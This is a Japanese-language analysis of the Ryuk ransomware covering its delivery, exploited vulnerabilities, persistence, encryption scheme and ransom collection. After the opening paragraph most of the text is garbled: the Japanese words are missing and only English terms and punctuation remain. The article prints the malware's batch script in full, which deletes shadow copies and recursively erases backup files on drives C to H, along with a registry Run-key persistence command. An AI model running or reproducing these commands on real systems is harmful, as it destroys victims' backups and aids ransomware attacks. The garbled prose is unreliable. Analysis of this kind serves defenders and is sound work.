サイバー犯罪者は、企業ネットワークに侵入し、入手可能なすべてのデータをコピーして、侵害されたすべてのリソースの情報を暗号化し、身代金を要求するという、超利益を得るためのほぼ理想的なスキームを自分たちで見つけました。被害者が支払いを拒否した場合、漏洩した情報を販売することができます。また、Norsk Hydroの例や、Kia Motors、Garmin、Hyundai、Kawasaki Heavy Industriesの最近の事例が示すように、暗号化されたシステムを実際に使用することはできません。Ryukは、近年最も成功したランサムウェアの1つと見なされており、そのオペレーターは1億5000万ドル以上を稼いでいます。トップランサムウェアがどのように機能するかを理解しましょう。
流通と浸透
Ryukは、ターゲットネットワークへの配信にさまざまなオプションを使用します。最も一般的なものの中には、他の悪意のあるプログラムによって拡散されています。2019年には、これらは主にTrickbotとEmotetでしたが、2020年に、Ryukオペレーターは、TrickBotの作成者の新しい開発であるドロッパーとしてBazarLoaderを使用し始めました。TrickBotと同様に、BazarLoaderは主に、悪意のある添付ファイルまたはマルウェアや無料のホスティングサイトへのリンクを含むフィッシングメールを介して拡散します。これらのフィッシングメールは、従来のソーシャルエンジニアリング手法を使用しており、社用書簡やその他の重要なメッセージを装っています。これらのキャンペーンの1つで、手紙には病気のCOVID-19米国大統領D.トランプに関する重要な情報が含まれていたとされています。
, , Google, , :
BazarLoader, , , Ryuk .
Trend Micro (Managed Detection and Response, MDR) Ryuk Trickbot MikroTik. RCE- MikroTik CVE-2018-1156 CVE-2018-14847. , TrickBot, SMB- EternalBlue . Trickbot - MikroTik, .
Ryuk , . :
;
;
Ryuk .
, Ryuk , -, , .
Powershell EternalBlue Zerologon.
40 180 taskskill net stop. , .
, Ryuk Run : reg add /C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ/d".
:
: RSA, .
: RSA, . .
: AES, Win32API- CryptGenKey . CryptExportKey RSA- , . , Ryuk CryptExportKey hExpKey, AES-. - AES CryptEncrypt.
, - , «Windows», «Mozilla», «Chrome», «RecycleBin» «Ahnlab».
, Ryuk , WnetOpenEnum/WnetEnumResource.
, Ryuk , windows.bat, , RyukReadMe.txt .
:
vssadmin Delete Shadows /all /quiet
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
vssadmin Delete Shadows /all /quiet
del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
del /s /f /q d:\*.VHD d:\*.bac d:\*.bak d:\*.wbcat d:\*.bkf d:\Backup*.* d:\backup*.* d:\*.set d:\*.win d:\*.dsk
del /s /f /q e:\*.VHD e:\*.bac e:\*.bak e:\*.wbcat e:\*.bkf e:\Backup*.* e:\backup*.* e:\*.set e:\*.win e:\*.dsk
del /s /f /q f:\*.VHD f:\*.bac f:\*.bak f:\*.wbcat f:\*.bkf f:\Backup*.* f:\backup*.* f:\*.set f:\*.win f:\*.dsk
del /s /f /q g:\*.VHD g:\*.bac g:\*.bak g:\*.wbcat g:\*.bkf g:\Backup*.* g:\backup*.* g:\*.set g:\*.win g:\*.dsk
del /s /f /q h:\*.VHD h:\*.bac h:\*.bak h:\*.wbcat h:\*.bkf h:\Backup*.* h:\backup*.* h:\*.set h:\*.win h:\*.dsk
del %0
vssadmin Delete Shadows /all /quiet ransomware’, vssadmin resize shadowstorage . , vssadmin, (, ), vssadmin .
vssadmin resize shadowstorage — , vssadmin . . 10% 401 M ( 300 M). , . vssadmin Delete Shadows /all /quiet.
. Bitcoin. protonmail.com tutanota.com. , Instagram. BitPaymer:
, , 1,7 99 BTC . 365 BTC, 18 (50 124 1 BTC).
Ryuk -. , .
, , , : , . , Ryuk Binance Huobi, . .
, 2018 2019 Ryuk 61 .
, . , , :
, . .
, Zerologon, .
, Ryuk Windows (C$ . .).
PowerShell , , PowerShell .
, .
, , /. ( ) « ».